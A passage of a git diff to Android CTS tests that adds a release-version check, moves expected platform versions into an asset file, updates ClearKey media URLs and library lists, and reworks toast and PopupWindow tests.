- final String GOOG = "www.google.com";
-
- if (pingTest(GOOG)) {
- Log.d(TAG, "Successfully pinged " + GOOG);
- } else {
- Log.e(TAG, "Failed to ping " + GOOG);
- }
-
if (pingTest(uri.getHost())) {
Log.d(TAG, "Successfully pinged " + uri.getHost());
} else {
diff --git a/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java b/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
index 9ead8fb..1d4500f 100644
--- a/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
+++ b/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
@@ -18,13 +18,12 @@
import static org.junit.Assert.assertThat;
import static org.junit.matchers.JUnitMatchers.containsString;
+import android.cts.util.MediaUtils;
import android.net.Uri;
-import android.os.Build;
import android.util.Log;
import android.view.Surface;
import android.view.SurfaceHolder;
-import android.cts.util.MediaUtils;
import com.google.android.collect.Lists;
import java.nio.ByteBuffer;
@@ -45,12 +44,11 @@
private static final String ISO_BMFF_VIDEO_MIME_TYPE = "video/avc";
private static final String ISO_BMFF_AUDIO_MIME_TYPE = "audio/avc";
private static final Uri CENC_AUDIO_URL = Uri.parse(
- "https://storage.googleapis.com/wvmedia/clear/h264/llama/" +
- "llama_aac_audio.mp4");
-
+ "http://yt-dash-mse-test.commondatastorage.googleapis.com/media/" +
+ "car_cenc-20120827-8c.mp4");
private static final Uri CENC_CLEARKEY_VIDEO_URL = Uri.parse(
- "https://storage.googleapis.com/wvmedia/clearkey/" +
- "llama_h264_main_720p_8000.mp4");
+ "http://yt-dash-mse-test.commondatastorage.googleapis.com/media/" +
+ "car_cenc-20120827-88.mp4");
private static final int UUID_BYTE_SIZE = 16;
private static final UUID CLEARKEY_SCHEME_UUID =
@@ -96,7 +94,7 @@
private boolean deviceHasMediaDrm() {
// ClearKey is introduced after KitKat.
- if (Build.VERSION.SDK_INT <= android.os.Build.VERSION_CODES.KITKAT) {
+ if (android.os.Build.VERSION.SDK_INT <= android.os.Build.VERSION_CODES.KITKAT) {
Log.i(TAG, "This test is designed to work after Android KitKat.");
return false;
}
@@ -172,12 +170,25 @@
}
connectionStatus.testConnection(videoUrl);
- if (!MediaUtils.checkCodecsForPath(mContext, videoUrl.toString())) {
+ if (!MediaUtils.checkCodecsForPath(mContext, videoUrl.getPath())) {
Log.i(TAG, "Device does not support " +
videoWidth + "x" + videoHeight + " resolution for " + mimeType);
return; // skip
}
+ // set to true if modify isVersionSmaller()
+ if (false)
+ unitTestIsVersionSmaller();
+
+ // This test requires two changes in frameworks/av (go/av/1628977 and
+ // go/ag/1598174) that are in 7.1.2 and above.
+ // Version 8 and above does not need this check.
+ if (isVersionSmaller(android.os.Build.VERSION.RELEASE, "7.1.2")) {
+ Log.i(TAG, "This test requires android \"7.1.2\" or higher.");
+ Log.i(TAG, "This device is running \"" +
+ android.os.Build.VERSION.RELEASE + "\".");
+ return; // skip
+ }
PlaybackParams params = new PlaybackParams();
params.surface = mActivity.getSurfaceHolder().getSurface();
params.mimeType = mimeType;
@@ -191,6 +202,16 @@
params.surface.release();
}
+ private void unitTestIsVersionSmaller() {
+ assertTrue(isVersionSmaller("6.9", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1.1", "7.1.2"));
+ assertTrue(isVersionSmaller("7.1.1.4", "7.1.2"));
+ assertFalse(isVersionSmaller("7.1.2", "7.1.2"));
+ assertFalse(isVersionSmaller("8.0", "7.1.2"));
+ assertFalse(isVersionSmaller("8.1.2", "7.1.2"));
+ }
+
private ArrayList<Integer> intVersion(String version) {
String versions[] = version.split("\\.");
@@ -201,6 +222,31 @@
return versionNumbers;
}
+ /**
+ * Return true if smaller, return false if great than or equal to the
+ * target version.
+ */
+ private boolean isVersionSmaller(String testVersion, String targetVersion) {
+ ArrayList<Integer> intTestVersion = intVersion(testVersion);
+ ArrayList<Integer> intTargetVersion = intVersion(targetVersion);
+
+ Iterator itr = intTestVersion.iterator();
+ for (int targetNumber : intTargetVersion) {
+ if (itr.hasNext()) {
+ int testNumber = (int) itr.next();
+ if (testNumber == targetNumber) {
+ continue;
+ } else {
+ return testNumber < targetNumber;
+ }
+ } else {
+ // treat test version as 0
+ return 0 != targetNumber;
+ }
+ }
+ return false;
+ }
+
private static native boolean isCryptoSchemeSupportedNative(final byte[] uuid);
private static native boolean testClearKeyPlaybackNative(final byte[] uuid,
diff --git a/tests/tests/os/Android.mk b/tests/tests/os/Android.mk
index 5397fc6a..4dc87b1 100644
--- a/tests/tests/os/Android.mk
+++ b/tests/tests/os/Android.mk
@@ -48,3 +48,34 @@
include $(BUILD_CTS_PACKAGE)
include $(call all-makefiles-under,$(LOCAL_PATH))
+
+# platform version check (b/32056228)
+# ============================================================
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := cts-platform-version-check
+LOCAL_MODULE_CLASS := ETC
+LOCAL_MODULE_TAGS := optional
+LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+
+cts_platform_version_path := cts/tests/tests/os/assets/platform_versions.txt
+cts_platform_version_string := $(shell cat $(cts_platform_version_path))
+
+include $(BUILD_SYSTEM)/base_rules.mk
+
+$(LOCAL_BUILT_MODULE) : $(cts_platform_version_path) build/core/version_defaults.mk
+ $(hide) if [ -z "$(findstring $(PLATFORM_VERSION),$(cts_platform_version_string))" ]; then \
+ echo "============================================================" 1>&2; \
+ echo "Could not find version \"$(PLATFORM_VERSION)\" in CTS platform version file:" 1>&2; \
+ echo "" 1>&2; \
+ echo " $(cts_platform_version_path)" 1>&2; \
+ echo "" 1>&2; \
+ echo "Most likely PLATFORM_VERSION in build/core/version_defaults.mk" 1>&2; \
+ echo "has changed and a new version must be added to this CTS file." 1>&2; \
+ echo "============================================================" 1>&2; \
+ exit 1; \
+ fi
+ @mkdir -p $(dir $@)
+ echo $(cts_platform_version_string) > $@
diff --git a/tests/tests/os/assets/platform_versions.txt b/tests/tests/os/assets/platform_versions.txt
new file mode 100644
index 0000000..6f9c237
--- /dev/null
+++ b/tests/tests/os/assets/platform_versions.txt
@@ -0,0 +1,3 @@
+7.1
+7.1.1
+7.1.2
diff --git a/tests/tests/os/src/android/os/cts/BuildVersionTest.java b/tests/tests/os/src/android/os/cts/BuildVersionTest.java
index e39249b..d06171b 100644
--- a/tests/tests/os/src/android/os/cts/BuildVersionTest.java
+++ b/tests/tests/os/src/android/os/cts/BuildVersionTest.java
@@ -16,10 +16,16 @@
package android.os.cts;
+import android.content.res.AssetManager;
import android.os.Build;
import android.platform.test.annotations.RestrictedBuildTest;
+import android.support.test.InstrumentationRegistry;
import android.util.Log;
+import java.io.BufferedReader;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.IOException;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
@@ -29,17 +35,16 @@
public class BuildVersionTest extends TestCase {
private static final String LOG_TAG = "BuildVersionTest";
- private static final Set<String> EXPECTED_RELEASES =
- new HashSet<String>(Arrays.asList("7.1","7.1.1","7.1.2"));
private static final int EXPECTED_SDK = 25;
private static final String EXPECTED_BUILD_VARIANT = "user";
private static final String EXPECTED_TAG = "release-keys";
+ private static final String PLATFORM_VERSIONS_FILE = "platform_versions.txt";
@SuppressWarnings("deprecation")
@RestrictedBuildTest
public void testReleaseVersion() {
// Applications may rely on the exact release version
- assertAnyOf("BUILD.VERSION.RELEASE", Build.VERSION.RELEASE, EXPECTED_RELEASES);
+ assertAnyOf("BUILD.VERSION.RELEASE", Build.VERSION.RELEASE, getExpectedReleases());
assertEquals("Build.VERSION.SDK", "" + EXPECTED_SDK, Build.VERSION.SDK);
assertEquals("Build.VERSION.SDK_INT", EXPECTED_SDK, Build.VERSION.SDK_INT);
}
@@ -94,4 +99,20 @@
", should be one of: " + permittedValues);
}
}
+
+ private Set<String> getExpectedReleases() {
+ Set<String> expectedReleases = new HashSet<String>();
+ final AssetManager assets =
+ InstrumentationRegistry.getInstrumentation().getTargetContext().getAssets();
+ String line;
+ try (BufferedReader br =
+ new BufferedReader(new InputStreamReader(assets.open(PLATFORM_VERSIONS_FILE)))) {
+ while ((line = br.readLine()) != null) {
+ expectedReleases.add(line);
+ }
+ } catch (IOException e) {
+ fail("Could not open file " + PLATFORM_VERSIONS_FILE + " to run test");
+ }
+ return expectedReleases;
+ }
}
diff --git a/tests/tests/permission/src/android/permission/cts/FileSystemPermissionTest.java b/tests/tests/permission/src/android/permission/cts/FileSystemPermissionTest.java
index 277198e..575b35e 100644
--- a/tests/tests/permission/src/android/permission/cts/FileSystemPermissionTest.java
+++ b/tests/tests/permission/src/android/permission/cts/FileSystemPermissionTest.java
@@ -538,6 +538,7 @@
"/data/mdl",
"/data/misc",
"/data/misc/bluetooth",
+ "/data/misc/bluetooth/logs",
"/data/misc/dhcp",
"/data/misc/lockscreen",
"/data/misc/sensor",
diff --git a/tests/tests/security/Android.mk b/tests/tests/security/Android.mk
index f2b4470..96e095a 100644
--- a/tests/tests/security/Android.mk
+++ b/tests/tests/security/Android.mk
@@ -26,33 +26,13 @@
LOCAL_JAVA_LIBRARIES := android.test.runner org.apache.http.legacy
LOCAL_JNI_SHARED_LIBRARIES := libctssecurity_jni libcts_jni libnativehelper_compat_libc++ \
- libnativehelper \
- libbinder \
- libutils \
- libmedia \
- libselinux \
- libcutils \
- libcrypto \
- libc++ \
- libbacktrace \
- libui \
- libsonivox \
- libexpat \
- libcamera_client \
- libgui \
- libaudioutils \
- libnbaio \
- libpcre \
- libpackagelistparser \
- libpowermanager \
- libbase \
- libunwind \
- libhardware \
- libsync \
- libcamera_metadata \
- libspeexresampler \
- liblzma \
- libstagefright_foundation
+ libnativehelper \
+ libcutils \
+ libcrypto \
+ libselinux \
+ libc++ \
+ libpcre \
+ libpackagelistparser
LOCAL_SRC_FILES := $(call all-java-files-under, src)\
src/android/security/cts/activity/ISecureRandomService.aidl\
diff --git a/tests/tests/security/jni/Android.mk b/tests/tests/security/jni/Android.mk
index d39ac7e..cbfbe3a 100644
--- a/tests/tests/security/jni/Android.mk
+++ b/tests/tests/security/jni/Android.mk
@@ -31,37 +31,16 @@
android_security_cts_MMapExecutableTest.cpp \
android_security_cts_EncryptionTest.cpp \
-LOCAL_C_INCLUDES := $(JNI_H_INCLUDE) \
- $(TOP)/frameworks/native/include/media/openmax
-
-LOCAL_SHARED_LIBRARIES := libnativehelper \
+LOCAL_SHARED_LIBRARIES := \
+ libnativehelper \
liblog \
- libutils \
- libmedia \
- libselinux \
- libdl \
libcutils \
libcrypto \
+ libselinux \
libc++ \
- libbacktrace \
- libui \
- libsonivox \
- libexpat \
- libcamera_client \
- libgui \
- libaudioutils \
- libnbaio \
libpcre \
libpackagelistparser \
- libpowermanager \
- libbase \
- libunwind \
- libhardware \
- libsync \
- libcamera_metadata \
- libspeexresampler \
- liblzma \
- libstagefright_foundation
+
LOCAL_C_INCLUDES += ndk/sources/cpufeatures
LOCAL_STATIC_LIBRARIES := cpufeatures
diff --git a/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java b/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
index 207e6ea..c2ecb3a 100644
--- a/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
+++ b/tests/tests/toastlegacy/src/android/widget/toast/cts/legacy/ToastTest.java
@@ -108,7 +108,10 @@
}
@Test
- public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly() throws Exception {
+ public void testAddTwoToastsViaAddingWindowApisWhenUidNotFocusedQuickly() throws Exception {
+ // Finish the activity so the UID loses focus
+ finishActivity(false);
+
try {
showToastsViaAddingWindow(2, false);
Assert.fail("Only one custom toast window at a time should be allowed");
@@ -120,6 +123,14 @@
}
@Test
+ public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedQuickly() throws Exception {
+ showToastsViaAddingWindow(2, false);
+
+ // Wait for the toast to timeout
+ waitForToastTimeout();
+ }
+
+ @Test
public void testAddTwoToastsViaAddingWindowApisWhenUidFocusedSlowly() throws Exception {
// Add one window
showToastsViaAddingWindow(1, true);
diff --git a/tests/tests/widget/res/layout/popup_window_scrollable.xml b/tests/tests/widget/res/layout/popup_window_scrollable.xml
new file mode 100644
index 0000000..aa1edd6
--- /dev/null
+++ b/tests/tests/widget/res/layout/popup_window_scrollable.xml
@@ -0,0 +1,101 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<ScrollView
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+
+ <RelativeLayout
+ android:id="@+id/main_container"
+ android:layout_width="10000dp"
+ android:layout_height="10000dp">
+
+ <View
+ android:id="@+id/anchor_upper_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_upper"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_upper_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_alignParentTop="true"
+ android:background="#f00" />
+
+ <View
+ android:id="@+id/anchor_middle_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_middle"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_middle_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_centerVertical="true"
+ android:background="#0f0" />
+
+ <View
+ android:id="@+id/anchor_lower_left"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentLeft="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ <View
+ android:id="@+id/anchor_lower"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_centerHorizontal="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ <View
+ android:id="@+id/anchor_lower_right"
+ android:layout_width="10dp"
+ android:layout_height="10dp"
+ android:layout_alignParentRight="true"
+ android:layout_alignParentBottom="true"
+ android:background="#00f" />
+
+ </RelativeLayout>
+
+</ScrollView>
\ No newline at end of file
diff --git a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
index 47efffc..918a161 100644
--- a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
+++ b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
@@ -16,6 +16,14 @@
package android.widget.cts;
+import static org.mockito.Matchers.anyInt;
+import static org.mockito.Mockito.any;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.times;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
import android.app.Activity;
import android.app.Instrumentation;
import android.content.Context;
@@ -44,13 +52,6 @@
import android.widget.TextView;
import android.widget.cts.R;
-import static org.mockito.Mockito.any;
-import static org.mockito.Mockito.mock;
-import static org.mockito.Mockito.never;
-import static org.mockito.Mockito.times;
-import static org.mockito.Mockito.verify;
-import static org.mockito.Mockito.when;
-
public class PopupWindowTest extends
ActivityInstrumentationTestCase2<PopupWindowCtsActivity> {
private Instrumentation mInstrumentation;
@@ -772,7 +773,19 @@
WindowManager.LayoutParams.FLAG_ALT_FOCUSABLE_IM & p.flags);
}
- public void testEnterExitTransition() {
+ public void testEnterExitTransitionAsDropDown() throws Throwable {
+ final View anchorView = mActivity.findViewById(R.id.anchor_upper);
+ verifyEnterExitTransition(
+ () -> mPopupWindow.showAsDropDown(anchorView, 0, 0));
+ }
+
+ public void testEnterExitTransitionAtLocation() throws Throwable {
+ final View anchorView = mActivity.findViewById(R.id.anchor_upper);
+ verifyEnterExitTransition(
+ () -> mPopupWindow.showAtLocation(anchorView, Gravity.BOTTOM, 0, 0));
+ }
+
+ private void verifyEnterExitTransition(Runnable showRunnable) throws Throwable {
TransitionListener enterListener = mock(TransitionListener.class);
Transition enterTransition = new BaseTransition();
enterTransition.addListener(enterListener);
@@ -791,8 +804,7 @@
verify(exitListener, never()).onTransitionStart(any(Transition.class));
verify(dismissListener, never()).onDismiss();
- final View anchorView = mActivity.findViewById(R.id.anchor_upper);
- mInstrumentation.runOnMainSync(() -> mPopupWindow.showAsDropDown(anchorView, 0, 0));
+ mInstrumentation.runOnMainSync(showRunnable);
mInstrumentation.waitForIdleSync();
verify(enterListener, times(1)).onTransitionStart(any(Transition.class));
verify(exitListener, never()).onTransitionStart(any(Transition.class));
@@ -1069,6 +1081,30 @@
assertEquals(LayoutParams.MATCH_PARENT, p.height);
}
+ public void testPositionAfterParentScroll() {
+ View.OnScrollChangeListener scrollChangeListener = mock(
+ View.OnScrollChangeListener.class);
+
+ getInstrumentation().runOnMainSync(() -> {
+ mActivity.setContentView(R.layout.popup_window_scrollable);
+
+ View anchor = mActivity.findViewById(R.id.anchor_upper);
+ PopupWindow window = createPopupWindow();
+ window.showAsDropDown(anchor);
+ });
+
+ getInstrumentation().runOnMainSync(() -> {
+ View parent = mActivity.findViewById(R.id.main_container);
+ parent.scrollBy(0, 500);
+ parent.setOnScrollChangeListener(scrollChangeListener);
+ });
+
+ getInstrumentation().waitForIdleSync();
+
+ verify(scrollChangeListener, never()).onScrollChange(
+ any(View.class), anyInt(), anyInt(), anyInt(), anyInt());
+ }
+
private static class BaseTransition extends Transition {
@Override
public void captureStartValues(TransitionValues transitionValues) {}